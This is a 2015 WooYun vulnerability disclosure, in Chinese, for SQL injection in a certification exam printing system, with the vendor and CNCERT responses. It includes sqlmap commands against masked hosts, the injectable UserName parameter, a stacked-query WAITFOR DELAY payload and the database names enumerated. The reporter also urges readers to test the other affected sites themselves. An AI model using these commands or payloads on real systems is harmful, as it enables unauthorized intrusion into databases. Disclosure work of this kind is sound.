漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0135703
漏洞标题:某从业人员资格认证系统存在SQL注入漏洞
相关厂商:cncert国家互联网应急中心
漏洞作者: flowind
提交时间:2015-08-24 23:00
修复时间:2015-10-10 18:38
公开时间:2015-10-10 18:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-26: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开
简要描述:
RT
详细说明:
**.**.**.**考试系统注入漏洞..包括整个c网下的所有网站都有类似漏洞
具体到底有多少自己去验证.都是一套系统..
至于影响范围 不多说了吧..
注入点
sqlmap.py -u "http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1"
**.**.**.**:7921/ccbp11admin/PrintExamCert.aspx?CandidateCode=asdfasd&UserName=asdasdasd&CheckKey=54eb80175fc760def339439c0dfadffa
current database: 'CCBP1120141017'
sqlmap.py -u "http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1" --dbs
current database: 'CCBP20070913'
简单2个..其他的自测...
漏洞证明:
sqlmap.py -u "http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1" --current-db
sqlmap.py -u "**.**.**.**:7921/ccbp11admin/PrintExamCert.aspx?CandidateCode=asdfasd&UserName=asdasdasd&CheckKey=54eb80175fc760def339439c0dfadffa"
GET parameter 'UserName' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 376 HTTP(s) requests:
---
Parameter: UserName (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: CandidateCode=asdfasd&UserName=asdasdasd';WAITFOR DELAY '0:0:5'--&CheckKey=54eb80175
---
缺点利用比较缓慢..
好吧...不登陆不能搜索了..只有厚脸皮求邀请了..
修复方案:
版权声明:转载请注明来源 flowind@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2015-08-26 18:37
厂商回复:
CNVD确认所述情况,已经转由CNCERT直接通报给对应银行集团公司,由其后续协调网站管理部门处置.
最新状态:
暂无